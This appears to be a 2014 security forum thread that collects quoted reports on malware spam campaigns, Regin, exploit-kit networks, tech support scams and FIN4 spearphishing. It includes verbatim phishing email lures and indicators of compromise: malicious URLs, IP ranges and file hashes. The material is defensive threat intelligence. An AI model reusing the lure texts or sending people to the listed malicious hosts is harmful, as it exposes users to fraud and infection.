You have received a 3 page fax at Mon, 24 Nov 2014 15:31:23 +0000.
* The reference number for this fax is chd_did11-14186364797-10847113200-628.
View this fax using your PDF reader.
Thank you for using the MyFax service!
The link in the message downloads a file faxmessage_7241_pdf61.zip which in turn contains a malicious executable faxmessage_7241_pdf.exe which has a VirusTotal detection rate of 4/53*... connects to the following URLs:
http ://95.211.199.37 :16792/2411us3/HOME/0/51-SP3/0/
http ://95.211.199.37 :16792/2411us3/HOME/1/0/0/
http ://lasuruguayas .com/images/refus3.pnk
A file EXE1.EXE is also dropped, with a VirusTotal detection rate of just 1/54**..."
* https://www.virustotal.com/en/file/bb34a977009276411c1eafa8a60d553c8ea847d32cc6071710eff6b743269e91/analysis/1416846678/
** https://www.virustotal.com/en/file/78eeb34989ac134081e005e076a46675cd0d2b4da552b4e6fe7e388489cde550/analysis/1416846980/
95.211.199.37: https://www.virustotal.com/en/ip-address/95.211.199.37/information/
199.26.87.212: https://www.virustotal.com/en/ip-address/199.26.87.212/information/
___
Regin: spy tool
- http://www.symantec.com/connect/blogs/regin-top-tier-espionage-tool-enables-stealthy-surveillance
Updated: 24 Nov 2014 - "... A back door-type Trojan, Regin is a complex piece of malware whose structure displays a degree of technical competence rarely seen. Customizable with an extensive range of capabilities depending on the target, it provides its controllers with a powerful framework for mass surveillance and has been used in spying operations against government organizations, infrastructure operators, businesses, researchers, and private individuals...
Regin’s five stages:
> http://www.symantec.com/connect/sites/default/files/users/user-1013431/fig1-architecture.png
... Almost half of all infections targeted private individuals and small businesses. Attacks on telecoms companies appear to be designed to gain access to calls being routed through their infrastructure.
Confirmed Regin infections by sector:
> http://www.symantec.com/connect/sites/default/files/users/user-1013431/fig2-sectors.png
The discovery of Regin highlights how significant investments continue to be made into the development of tools for use in intelligence gathering. Symantec believes that many components of Regin remain undiscovered and additional functionality and versions may exist..."
> http://www.symantec.com/security_response/writeup.jsp?docid=2013-121221-3645-99
- http://community.websense.com/blogs/securitylabs/archive/2014/11/24/what-protection-can-be-offered-from-sophisticated-malware-such-as-regin.aspx
24 Nov 2014
___
Avast AV can't handle Windows fixes ??
- http://www.theregister.co.uk/2014/11/24/you_stupid_brick_pcs_running_avast_av_cant_handle_windows_fixes/
24 Nov 2014 - "Security software outfit Avast are trying to figure out why the combination of recent Windows patches and updates to the latter company's software are breaking PCs. Hordes of users have found that their PCs, especially those running Windows 8 and 8.1, grind to a halt after they apply both Microsoft's recent KB3000850 update rollup and Avast's latest automatic updates. Some users report their PCs won't boot, or take forever to apply patches... Avast forums*... Microsoft's not immune either: a Redmond thread titled Major issues with KB3000850 includes plenty of people wondering why the company issued an update incompatible with third-party software**. That criticism may not be entirely fair, as an Avast staffer has posted the following explanation for the mess:
'We have been able to simulate the problem in our lab and I think we fixed this issue. This Windows updates calls new memory related functions which are not fully compatible with Avast' ... Whatever the cause, a fair few people are rather upset with both Avast and Microsoft, with the latter company most often felt to be in the wrong..."
* https://forum.avast.com/index.php?topic=160717.0
** http://answers.microsoft.com/en-us/windows/forum/windows8_1-windows_update/major-issues-with-kb3000850/5cb4cddd-52da-44af-9fd5-3ae1a72b0b1a
___
FTC Obtains Court Orders Temporarily Shutting Down Massive Tech Support Scams
FTC, State of Florida Charge Companies Bilked $120 Million from Consumers for Bogus Software and Tech Support Service
- http://www.ftc.gov/news-events/press-releases/2014/11/ftc-obtains-court-orders-temporarily-shutting-down-massive-tech
Nov 19, 2014 - "At the request of the Federal Trade Commission and the State of Florida, a federal court has temporarily shut down two massive telemarketing operations that conned tens of thousands of consumers out of more than $120 million by deceptively marketing computer software and tech support services. The orders also temporarily freeze the defendants’ assets and place the businesses under the control of a court-appointed receiver. According to complaints filed by the FTC, since at least 2012, the defendants have used software designed to trick consumers into thinking there are problems with their computers, then subjected those consumers to high-pressure deceptive sales pitches for tech support products and services to fix their non-existent computer problems... In this latest action, the FTC and the State of Florida have filed two separate cases against companies who allegedly sold the -bogus- software and the deceptive telemarketing operators who allegedly sold -needless- tech support services:
- In the first case, the defendants selling software include PC Cleaner Inc.; Netcom3 Global Inc.; Netcom3 Inc., also doing business as Netcom3 Software Inc.; and Cashier Myricks, Jr. The telemarketing defendants include Inbound Call Experts LLC; Advanced Tech Supportco. LLC; PC Vitalware LLC; Super PC Support LLC; Robert D. Deignan, Paul M. Herdsman, and Justin M. Wright.
- In the second case, the defendants selling software include Boost Software Inc. and Amit Mehta, and the telemarketing defendants include Vast Tech Support LLC, also doing business as OMG Tech Help, OMG Total Protection, OMG Back Up, downloadsoftware.com, and softwaresupport.com; OMG Tech Help LLC; Success Capital LLC; Jon Paul Holdings LLC; Elliot Loewenstern; Jon-Paul Vasta; and Mark Donahue.
According to the FTC’s complaints, each scam starts with computer software that purports to enhance the security or performance of consumers’ computers. Typically, consumers download a free trial version of software that runs a computer system scan. The defendants’ software scan always identifies numerous errors on consumers’ computers, regardless of whether the computer has any performance problems..."
:fear::fear:
AplusWebMaster
2014-11-25, 16:29
FYI...
What the heck is with 104.152.215.0/25?
- http://blog.dynamoo.com/2014/11/what-heck-is-with-104152215025.html
25 Nov 2014 - "A contact gave me the heads up to an exploit-kit running on 104.152.215.90* [virustotal] which appears to be using MS16-064** among other things . 104.152.215.90 belongs to Query Foundry LLC in Wyoming, however they suballocated it to a customer... The random structure of most of the domains is an indicator of possible maliciousness. The few domains that don't meet these pattern seem to be .fr domains which look like they have been hijacked or re-registered.. and oddly they are all registered to different (often obviously fake) people at the same address in France... not much data about the range, there are a couple of domains that are also flagged a malicious:
sxzav .xyz [Google diagnostics]: [url]http://www.google.com/safebrowsing/diagnostic?site=sxzav.xyz
klioz .xyz [Google diagnostics]: http://www.google.com/safebrowsing/diagnostic?site=klioz.xyz
... there is enough evidence to treat 104.152.215.0/25 as a suspect network. It does not appear to have any legitimate sites, the sites that do exist are of an unknown purpose and often have apparently fake WHOIS details for the domains. Blocking or monitoring for traffic to and from that /25 is the easiest way of doing it..."
* https://www.virustotal.com/en/ip-address/104.152.215.90/information/
** https://technet.microsoft.com/en-us/library/security/ms14-064.aspx
*** http://urlquery.net/report.php?id=1416802220951
___
Fake 'my photo' SPAM - new trojan variant
- http://blog.mxlab.eu/2014/11/25/latest-my-photo-email-contains-new-trojan-variant/
Nov 25, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “my photo”.
This email is sent from a spoofed address and has the following body:
my new photo :)
The attached file my_iphone_photo.zip contains the folder with the 54 kB large file 1my_photo.exe and the 30 kB large file 2my_photo.jpg. The trojan is known as a variant of MSIL/Injector.GMB, UDS:DangerousObject.Multi.Generic, Trojan.MSIL.BVXGen or Win32.Trojan.Inject.Auto. At the time of writing, 4 of the 54 AV engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/28993a2effd007e5d6c5453f61268c37c94c8d666156d0ebcae2e4dca004dcff/analysis/1416912927/
:fear: :mad:
AplusWebMaster
2014-11-27, 05:17
FYI...
QuickBooks Payment Overdue Spam
- http://threattrack.tumblr.com/post/103653348923/quickbooks-payment-overdue-spam
Nov 26, 2014 - "Subjects Seen:
Payment Overdue
Typical e-mail details:
Please find attached your invoices for the past months. Remit the payment by 07/22/2014 as outlines under our “Payment Terms” agreement.
Thank you for your business,
Sincerely,
Lucio Gee
This e-mail has been sent from an automated system. PLEASE DO NOT REPLY.
Malicious File Name and MD5:
Invoice_[-var=partorderb].zip (A3374A3639D4F8EBF105B8FFA1ACB4D1)
Invoice_0128648.scr (08AEA8B75143DC788A52568E823DD10E)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/1856c0ee3c8aea258ec44e55795007bc/tumblr_inline_nfnt72zuuJ1r6pupn.png
Tagged: QuickBooks, Upatre
:fear::fear:
AplusWebMaster
2014-11-27, 15:35
FYI...
Fake HMRC SPAM - fake PDF malware
- http://myonlinesecurity.co.uk/hmrc-taxes-application-reference-68j9-wdwk-1nmj-p0za-received-fake-pdf-malware/
27 Nov 2014 - "'HMRC taxes application with reference 68J9 WDWK 1NMJ P0ZA received' pretending to come from noreply@ taxreg.hmrc .gov.uk with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
The application with reference number 68J9 WDWK 1NMJ P0ZA submitted by you or your agent to register for HM Revenue & Customs (HMRC) taxes has been received and will now be verified. HMRC will contact you if further information is needed.
The original of this email was scanned for viruses by the Government Secure Intranet virus scanning service supplied by Vodafone in partnership with Symantec. (CCTM Certificate Number 2009/09/0052.) On leaving the GSi this email was certified virus free.
Communications via the GSi may be automatically logged, monitored and/or recorded for legal purposes.
27 November 2014: HM Revenue & Customs – TAX.zip: Extracts to: HM Revenue & Customs – TAX.scr
Current Virus total detections: 2/56* ( same malware as THIS**). This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/580df36f77762a526dced5127ae216a057314bea0b80e92e239db41f8a4f46b0/analysis/1417085413/
... Behavioural information
TCP connections
95.211.199.37: https://www.virustotal.com/en/ip-address/95.211.199.37/information/
83.125.22.167: https://www.virustotal.com/en/ip-address/83.125.22.167/information/
** http://myonlinesecurity.co.uk/info-santanderbillpayment-co-uk-fake-pdf-malware/
___
Tainted network: Crissic Solutions (167.160.160.0/19)
- http://blog.dynamoo.com/2014/11/tainted-network-crissic-solutions.html
27 Nov 2014 - "Several IPs hosted on the Crissic Solutions range of 167.160.160.0/19 (suballocated from QuadraNet) have been hosting exploit kits in the past few days, leading to Cryptolocker and other nastiness. I analysed over 1500 sites hosted in the Crissic IP address range... and many sites were already marked as being -malicious- by Google, and some other sites obviously follow the same naming pattern and must be considered as malicious... Given the concentration of active malicious servers in 167.160.165.0/24 and 167.160.166.0/24 then I would recommend -blocking- your traffic to those ranges at least temporarily, despite there being legitimate sites in that range. You might choose to block the entire /19 of course, I will leave you to look at the evidence..."
More detail at the dynamoo URL above.)
:fear: :mad:
AplusWebMaster
2014-11-28, 14:47
FYI...
Black Friday: deal or no deal
- https://blog.malwarebytes.org/online-security/2014/11/black-friday-deal-or-no-deal/
Nov 27, 2014 - "... Spammers and scammers have risen to the occasion with deals that are too good to be true such as in this example for -fake- Gucci products. This was reported in a Tweet by Denis Sinegubko, from Unmask Parasites*
* http://www.unmaskparasites.com/ -- https://twitter.com/unmaskparasites
'Denis @unmaskparasites - Chinese spammers are ready for Black Friday. Found these domains in code on a hacked site: GucciBlackFridays .com, BlackFridayCDN .com'
... and also a security researcher at Sucuri** -- http://sucuri.net/ -- http://blog.sucuri.net/2014/11
The site boasts incredible prices on normally very expensive merchandise... Shoppers might get fooled by the security badges and stamps, which of course are only here for show... Traffic to these -bogus- sites will come from spam or, as in this case, from compromised websites... This code resides on the compromised server and performs different checks, in particular whether the user visiting the page is real or a search engine... When Black Friday is over, the crooks will be ready to serve you special deals for Cyber Monday... There certainly are good deals to be made during this holiday season but you really ought to be careful what you click on. You might order counterfeit goods or have your banking credentials stolen and money depleted..."
(More detail at the malwarebytes URL above.)
- https://blog.malwarebytes.org/online-security/2014/11/black-friday-and-cyber-monday-online-shopping-made-safer/
Nov 24, 2014
- http://www.trendmicro.com/vinfo/us/security/news/mobile-safety/a-guide-to-avoiding-cyber-monday-scams-on-mobile
Nov 24, 2014
- http://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/staying-safe-from-online-threats-this-thanksgiving
Nov 21, 2014
___
Lots of Black Friday SPAM & Phishing
- https://isc.sans.edu/diary.html?storyid=19003
2014-11-28 23:20:46 UTC - "Likely every reader out there, their friends and family, even their pets with email accounts, have received Black Friday SPAM or phishing attempts today. Our own Dr. J sent the handlers an Amazon sample for 'One Click Black Friday Rewards'.
Of course, that one click goes -nowhere- near Amazon and directs you to the likes of Black Fiday (yes, it's misspelled) at hXXp ://www.jasbuyersnet .com/cadillac/umbered/sedatest/styes/coleuses/unterrified.htm. Can't speak to the payload there, don't bother, just use it at as ammo for heightened awareness and safe shopping on line during these holidays, and...well, all the time. Be careful out there. :-)
Cheers and happy holidays."
___
Best Buy Order Spam
- http://threattrack.tumblr.com/post/103809164928/best-buy-order-spam
Nov 28, 2014 - "Subjects Seen:
Details of Your Order From Best Buy
Typical e-mail details:
E-shop Best Buy has received an order addressed to you which has to be confirmed by the recipient within 4 days.
Upon confirmation you may pick it in any nearest store of Best Buy.
Detailed order information is attached to the letter.
Wishing you Happy Thanksgiving!
Best Buy
Malicious File Name and MD5:
BestBuy_Order.exe (bff17aecb3cc9b0281275f801026b75d)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/8d119ffd996422b655f2ff200a50953b/tumblr_inline_nfrayxzYyG1r6pupn.jpg
Tagged: Best Buy, Kuluoz
:fear::fear: :mad:
AplusWebMaster
2014-12-01, 21:33
FYI...
Dridex Phish uses malicious word docs
- https://isc.sans.edu/diary.html?storyid=19011
2014-12-01 - "... During the past few months, Botnet-based campaigns have sent waves of phishing emails associated with Dridex... The emails contained malicious Word documents, and with macros enabled, these documents -infected- Windows computers with Dridex malware. Various people have posted about Dridex [1] [2], and some sites like Dynamoo's blog and TechHelpList... often report on these and other phishing campaigns... On 11 Nov 2014, I saw at least 60 emails with 'Duplicate Payment Received' in the subject line. This appeared to be a botnet-based campaign from compromised hosts at various locations across the globe... Monitoring the infection traffic on Security Onion, we found alerts for Dridex traffic from the EmergingThreats signature set (ET TROJAN Dridex POST Checkin) [3]... File hashes changed during this wave of emails, indicating at least 3 different Word documents were used. During this phishing run, Dridex malware came from IP addresses in the 62.76.185.0/24 block..."
1] http://stopmalvertising.com/malware-reports/analysis-of-dridex-cridex-feodo-bugat.html
2] http://www.abuse.ch/?p=8332
3] https://isc.sans.edu/diaryimages/images/brad5.png
4] http://doc.emergingthreats.net/2019478
62.76.185.127: https://www.virustotal.com/en/ip-address/62.76.185.127/information/
___
Fake 'New offer Job' SPAM - PDF malware
- http://myonlinesecurity.co.uk/new-offer-job-fake-pdf-malware/
1 Dec 2014 - "'New offer Job' with a zip attachment pretending to come from Job service <billiond8@ greatest3threeisland .com> is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
New offer for you, see attached here.
There is also a version around with the subject of 'Tiket alert' pretending to come from FBR service <newspaperedixv@ greatest3threeisland .com>
Look at the attached file for more information.
Assistant Vice President, FBR service
Management Corporation
Both emails contain the same malware as does today’s version of 'my new photo malware'*
1 December 2014 : tiket.zip: Extracts to: tiket.exe
Current Virus total detections: 5/19** . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* http://myonlinesecurity.co.uk/new-photo-malware/
** https://www.virustotal.com/en/file/3baa6154cae386bd89d4fce302adad6b5085cac01bcbe03c4fc709ee5173f07e/analysis/1417475226/
___
Phishing scam that hit Wall Street might work against you
- http://arstechnica.com/security/2014/12/phishing-scam-that-penetrated-wall-street-just-might-work-against-you-too/
Dec 1 2014 - "Researchers have uncovered a group of Wall Street-savvy hacks that have penetrated the e-mail accounts of more than 100 companies, a feat that has allowed them to obtain highly valuable plans concerning corporate acquisitions and other insider information.
> http://cdn.arstechnica.net/wp-content/uploads/2014/12/outlook-phish-640x359.jpg
FIN4, as the group is known, relies on a set of extremely simple tactics that in many cases has allowed them to remain undetected since at least the middle of 2013, according to a report published Monday from security firm FireEye*. Members boast a strong command of the English language and knowledge of corporate finance and Fortune 500 culture. They use that savvy to send highly targeted spearphishing e-mails that harvest login credentials for Microsoft Outlook accounts. The group then uses compromised accounts of one employee, customer, or partner to send spearphishing e-mails to other company insiders. At times, the attackers will -inject- a malicious message into an ongoing e-mail discussion among multiple people, furthering their chances of success. E-mails are sent from the accounts of people the target knows, and they discuss mergers, acquisitions, or other topics already in progress. The attackers often bcc other recipients to make it more difficult to detect the malicious e-mail. The messages appear to be written by native English speakers and often contain previously exchanged Microsoft Office documents that embed hidden malicious macros. This results in fraudulent e-mails that are extremely hard to detect, even by some people who have been trained to spot such phishing campaigns... FireEye researchers said FIN4 members have compromised the accounts of C-level executives, legal counsel, regulatory and compliance personnel, scientists, and advisors of more than 100 companies. About 80 of them are publicly traded companies, while the remaining 20 are Wall Street firms that advise corporations on legal or securities matters or possible or pending mergers and acquisitions. As a result, the group stood to make a windfall if it used the insider information to buy or sell stocks before the information became widely known... Embedded in the previously stolen documents are Visual Basic Applications (VBA) macros that prompt readers to enter the Outlook user names and passwords. The scripts then funnel the credentials to servers controlled by the attackers. In other, earlier cases, the spearphishing e-mails contained links to fake Outlook Web App login pages that prompted visitors to enter their passwords. Some of the attacks FireEye observed targeted multiple parties inside law firms, consultancies, and corporations as they discussed particular pending business deals. In one instance, attackers used previously acquired access to e-mail accounts at an advisory firm to harvest information being exchanged about an acquisition under consideration involving one of its clients... the best thing any potential target can do is to educate employees how to spot phishing attacks. The FIN4 attackers have just raised the bar, so chances are most education programs should be revised to help employees spot these new and improved tactics."
* https://www.fireeye.com/blog/threat-research/2014/11/fin4_stealing_insid.html
- http://www.reuters.com/video/2014/12/02/cyber-spies-steal-corporate-secrets-to-r?videoId=347691634
Dec 01, 2014
Video: 02:09
- http://www.computerworld.com/article/2853697/fireeye-suspects-fin4-hackers-are-americans-after-insider-info-to-game-stock-market.html
Dec 1, 2014
> http://core0.staticworld.net/images/article/2014/12/fin4-targets-100533260-large.idge.jpg
- http://www.theregister.co.uk/2014/12/02/malware_raids_stock_markets/
2 Dec 2014
> http://regmedia.co.uk/2014/12/02/11223.png
___
Europol and US customs seize 292 domains selling counterfeit goods
- http://www.theinquirer.net/inquirer/news/2384329/europol-and-us-customs-seize-292-domains-selling-counterfeit-goods
Dec 1, 2014 - "... Interpol in conjunction with US Immigration and Customs Enforcement has seized the domains of almost 300 websites that were selling counterfeit merchandise. The law enforcement agencies, not to mention politicians, are concerned that citizens are being taken for mugs online and cannot resist spending good money on fake rubbish... Europol said that the seizures involved 25 law enforcement agencies from 19 countries and participation from the US National Intellectual Property Rights Coordination Center... The websites offered a mix of content, ranging from luxury goods and sportswear to CDs and DVDs. The domains are now in the hands of the national governments involved in the shutdowns, and the gear is presumably facing some sort of immolation. Operation In Our Sites has closed down 1,829 domains so far..."
___
O/S Market Share - Nov 2014
- http://www.netmarketshare.com/operating-system-market-share.aspx?qprid=10&qpcustomd=0
Browser Market Share - Nov 2014
- http://www.netmarketshare.com/browser-market-share.aspx?qprid=0&qpcustomd=0
___
PoS Malware 'd4re|dev1|' attacking Ticket Machines and Electronic Kiosks
- https://www.intelcrawler.com/news-24
Nov 26, 2014 - "... new type of Point-of-Sale malware called “d4re|dev1|”. This new strain of malware, which is hitting Mass Transit Systems, acts as an advanced backdoor with remote administration, having RAM scrapping and keylogging features. This new POS malware find adds to a growing list of POS variants being developed by underground cyber criminals because of the high ROI when they hit payloads like a Target or Home Depot. Variants recently identified and profiled by IntelCrawler include POSCLOUD, Nemanja, JackPOS, BlackPOS, and Decebal. The exploitation of merchants is taking place on a global scale as outlined by the IntelCrawler POS infection map*.
* https://www.intelcrawler.com/analytics/pmim
... The malware has a “File Upload” option, which can be used for remote payload updating. The process of malware was masked under “PGTerm.exe” or “hkcmd.exe”, as well as legitimate names of software such as Google Chrome. Adversaries use this option for the installation of additional backdoors and tools, which allows them to avoid infrastructure limitations and security policies designed for detection. This broad lateral approach shows that serious cybercriminals are not interested in just one particular Point-of-Sale terminal – they are looking for enterprise wide network environments, having tens of connected devices accepting payments and returning larger sets of spoils to their C2 servers... As this POS malware market is evolving, new security measures are needed to combat the seemingly continuous strains being developed by the underground. In addition to consulting your PCI vendor, IntelCrawler strongly recommends to encapsulate any administration channels to the -VPN- as well as to limit the software environment for operators, using proper access control lists and updated security polices..."
:fear: :mad:
AplusWebMaster
2014-12-02, 14:43
FYI...
Fake Walmart 'Order Details' SPAM opens malware site
- http://www.hoax-slayer.com/walmart-order-details-malware.shtml
Dec 2, 2014 - "Email purporting to be from Walmart claims that you can click a link to read more information about a recent order. The email is a scam... Clicking the link opens a website that contains malware. This attack is very similar to another malware campaign in which -bogus- emails claim to be from Costco*...
> http://www.hoax-slayer.com/images/walmart-order-details-malware-1.jpg
This email, which claims to be from retail giant Walmart, advises that your order is ready to be picked up at any local store. It invites you to -click-a-link- to find out more information about the supposed order... the email is -not- from Walmart and has nothing to do with any order you have made. The goal of the email is simply to trick you into clicking the link. If you receive this email, you may be concerned that fraudulent purchases have been made in your name and click the link in the hope of finding out more details... the link opens a compromised website that harbours malware. In some versions, the malicious download may start automatically. In other cases, a notice on the website may instruct you to download a file to view the order information. Generally, the download will be a .zip file that contains a .exe file inside. Clicking the .exe file will install the malware on your computer. The exact malware payload delivered in such attacks may vary... This attack closely mirrors another current malware campaign that uses emails that falsely claim to be from Costco*. Again, the email claims that you can get information about recent purchase by clicking a link. Clicking downloads a .zip file that contains malware."
* http://www.hoax-slayer.com/costco-order-notification-malware.shtml
Nov 28, 2014
> http://www.hoax-slayer.com/images/costco-order-notification-malware-2.jpg
___
Fake 'FEDEX TRACK' 'FEDEX INFO' SPAM - contains trojan
- http://blog.mxlab.eu/2014/12/02/fake-emails-from-fedex-track-or-fedex-info-contains-trojan/
Dec 2, 2014 - "... intercepted a new trojan distribution campaign by email with the subjects like:
- Ezekiel Francis your agent FEDEX
- Bullock, Tiger P. agent FEDEX
- Quin Greer FEDEX company
This email is sent from the -spoofed- address “FEDEX TRACK <******@ care .it>”, FEDEX INFO <fedexservice@ care .info> or “FEDEX INFO <fedextechsupport@ care .org>” and has the following body:
Dear Customer!
We attempted to deliver your package on December 2th, 2014, 10:50 AM.
The delivery attempt failed because the address was business closed or nobody could sign for it.
To pick up the package,please, print the invoice that is attached to this email and visit Fedex location indicated in the receipt.
If the package is not picked up within 48 hours, it will be returned to the shipper.
Label/Receipt Number: 45675665665
Expected Delivery Date: December 2th, 2014
Class: International Package Service
Service(s): Delivery Confirmation
Status: Notification sent
Thank you ...
The attached file Package.zip contains the 180 kB large file 45675665665.scr... At the time of writing, 3 of the 54 AV engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/3848d21eddfb5d70a39406bf45652f6daed3432cbd61bef50e705350904ebd3b/analysis/
___
Iran hacks target airlines, energy, defense companies
- http://www.reuters.com/article/2014/12/02/us-cybersecurity-iran-idUSKCN0JG18I20141202
Dec 2, 2014 - "Iranian hackers have infiltrated major airlines, energy companies, and defense firms around the globe over the past two years in a campaign that could eventually cause physical damage, according to U.S. cyber security firm Cylance*. The report comes as governments scramble to better understand the extent of Iran's cyber capabilities, which researchers say have grown rapidly as Tehran seeks to retaliate for Western cyber attacks on its nuclear program... The California-based company said its researchers uncovered breaches affecting more than 50 entities in 16 countries, and had evidence they were committed by the same Tehran-based group that was behind a previously reported 2013 cyber attack on a U.S. Navy network. It did not identify the companies targeted, but said they included major aerospace firms, airports and airlines, universities, energy firms, hospitals, and telecommunications operators based in the United States, Israel, China, Saudi Arabia, India, Germany, France, England and others. Cylance said it had evidence the hackers were Iranian, and added the scope and sophistication of the attacks suggested they had state backing... Cylance Chief Executive Stuart McClure said the Iranian hacking group has so far focused its campaign - dubbed Operation Cleaver - on intelligence gathering, but that it likely has the ability to launch attacks. He said researchers who succeeded in gaining access to some of the hackers' infrastructure found massive databases of user credentials and passwords from organizations including energy, transportation, and aerospace companies, as well as universities. He said they also found diagrams of energy plants, screen shots demonstrating control of the security system for a major Middle Eastern energy company, and encryption keys for a major Asian airline... Cylance said its researchers also obtained hundreds of files apparently stolen by the Iranian group from the U.S. Navy's Marine Corps Intranet (NMCI). U.S. government sources had confirmed that Iran was behind the 2013 NMCI breach..."
* http://blog.cylance.com/operation-cleaver-prevention-is-everything
Dec 2, 2014
- http://www.cylance.com/operation-cleaver/?&__hssc=&__hstc&hsCtaTracking=d1078200-8921-49f2-ab9c-6f87b7a0c3ee|25e0e347-ef8e-475e-9c59-4b051299b3ea
___
Fake 'Voice Message from Message Admin' SPAM - leads to malware
- http://blog.mxlab.eu/2014/12/01/fake-emails-voice-message-0174669888-from-message-admin-leads-to-malware/
Dec 1, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “Voice Message #0174669888″ (number will vary). This email is sent from the -spoofed- address 'Message Admin <NoRepse@ voiceservice .com>” and has the following body:
Voice redirected message
hxxp ://www.studio37kriswhite .com/voicemail/listen.php
Sent: Mon, 1 Dec 2014 19:06:35 +0000
Voice redirected message
hxp ://thepinkcompany .com/voicemail/listen.php
Sent: Mon, 1 Dec 2014 20:10:47 +0000
The embedded URL leads to a web page with a Javascript that is making use of an ActiveXObject to download the file voice646-872-8712_wav.zip. Once extracted, the 43 kB large file voice646-872-8712_wav.exe is present. The trojan is known as W32.HfsAutoA.631F, Trojan.DownLoader11.46947, UDS:DangerousObject.Multi.Generic , Upatre.FE or BehavesLike.Win32.Backdoor.pz.
The trojan is capable of starting a listening server, make HTTP requests, can fingerprint a system and have outbound communication. A service bowmc.exe will be installed, the TCP port 1034 will be opened and connection with the IP on port 21410 and 21397 will be openened for outbound traffic. At the time of writing, 8 of the 55* AV engines did detect the trojan at Virus Total..."
* https://www.virustotal.com/en/file/8e3b9d3e0c04be729180a959c167ac3330fb4d3506e6ab5375a1876f2b1f6cca/analysis/1417468098/
... Behavioural information
TCP connections
192.186.219.137: https://www.virustotal.com/en/ip-address/192.186.219.137/information/
UDP communications
91.200.16.56: https://www.virustotal.com/en/ip-address/91.200.16.56/information/
91.200.16.37: https://www.virustotal.com/en/ip-address/91.200.16.37/information/
:mad: :fear::fear:
AplusWebMaster
2014-12-03, 16:45
FYI...
More malware on Crissic Solutions LLC
- http://blog.dynamoo.com/2014/12/more-malware-on-crissic-solutions-llc.html
3 Dec 2014 - "Another bunch of IPs on Crissic Solutions LLC, leading to what appears to be the Angler EK (see this URLquery report*):
167.160.164.102: https://www.virustotal.com/en/ip-address/167.160.164.102/information/
167.160.164.103: https://www.virustotal.com/en/ip-address/167.160.164.103/information/
167.160.164.141: https://www.virustotal.com/en/ip-address/167.160.164.141/information/
167.160.164.142: https://www.virustotal.com/en/ip-address/167.160.164.142/information/
... domains are being exploited (although there will probably be more soon)... Subdomains in use start with one of qwe. or asd. or zxc... Crissic Solutions LLC operates 167.160.160.0/19 which does have some legitimate sites in it, but since I have previously recommended** blocking 167.160.165.0/24 and 167.160.166.0/24 and now with -multiple- servers on 167.160.164.0/24 also compromised then I suspect that temporarily blocking the entire /19 is the way to go."
* http://urlquery.net/report.php?id=1417554412643
** http://blog.dynamoo.com/2014/11/tainted-network-crissic-solutions.html
___
Fake 'Fedex Unable to deliver your item' SPAM - malware
- http://myonlinesecurity.co.uk/fedex-unable-deliver-item-00486182-malware/
3 Dec 2014 - "'FedEx Unable to deliver your item, #00486182' pretending to come from FedEx International Economy with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
FedEx ®
Dear Customer,
We could not deliver your parcel.
Please, open email attachment to print shipment label.
Regards,
Francis Huber,
Delivery Agent.
(C) 2014 FedEx. The content of this message is protected by copyright and trademark laws. All rights reserved.
3 December 2014: Label_00486182.zip: Extracts to: Label_00486182.doc.js
Current Virus total detections: 4/55* ... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/8e78a7c9ae488585a690dc8b5f3b6ebafaf8451ec93462810bd632e51e228fd3/analysis/1417611902/
___
Be Wary of ‘Order Confirmation’ Emails
- http://krebsonsecurity.com/2014/12/be-wary-of-order-confirmation-emails/
Dec 3, 2014 - "If you receive an email this holiday season asking you to “confirm” an online e-commerce order or package shipment, please resist the urge to -click- the included -link- or attachment: Malware purveyors and spammers are blasting these missives by the millions each day in a bid to trick people into giving up control over their computers and identities.
'Order confirmation' malware email blasted out by the Asprox spam botnet:
>> http://krebsonsecurity.com/wp-content/uploads/2014/12/hd-asprox-600x273.png
Seasonal scams like these are a perennial scourge of the holidays, mainly because the methods they employ are reliably successful. Crooks understand that it’s easier to catch would-be victims off-guard during the holidays. This goes even for people who generally know better than to click on links and attachments in emails that spoof trusted brands and retailers, because this is a time of year when many people are intensely focused on making sure their online orders arrive before Dec. 25:
This Asprox malware email poses as a notice about a wayward package from a WalMart order.
>> http://krebsonsecurity.com/wp-content/uploads/2014/12/wm-asprox-600x308.png
According to Malcovery*, a company that closely tracks email-based malware attacks, these phony “order confirmation” spam campaigns began around Thanksgiving, and use both booby-trapped links and attached files in a bid to infect recipients’ Windows PCs with the malware that powers the Asprox spam botnet. Asprox is a nasty Trojan that harvests email credentials and other passwords from infected machines, turns the host into a zombie for relaying junk email...
Target is among the many brands being spoofed by Asprox this holiday season:
>> http://krebsonsecurity.com/wp-content/uploads/2014/12/tg-asprox-600x373.png
... do not click the embedded links or attachments..."
* http://blog.malcovery.com/blog/asprox-malware-threat-targets-holiday-shoppers
Dec 3, '14
:fear: :mad:
AplusWebMaster
2014-12-04, 18:04
FYI...
Something evil on 46.161.30.0/24
- http://blog.dynamoo.com/2014/12/something-evil-on-4616130024.html
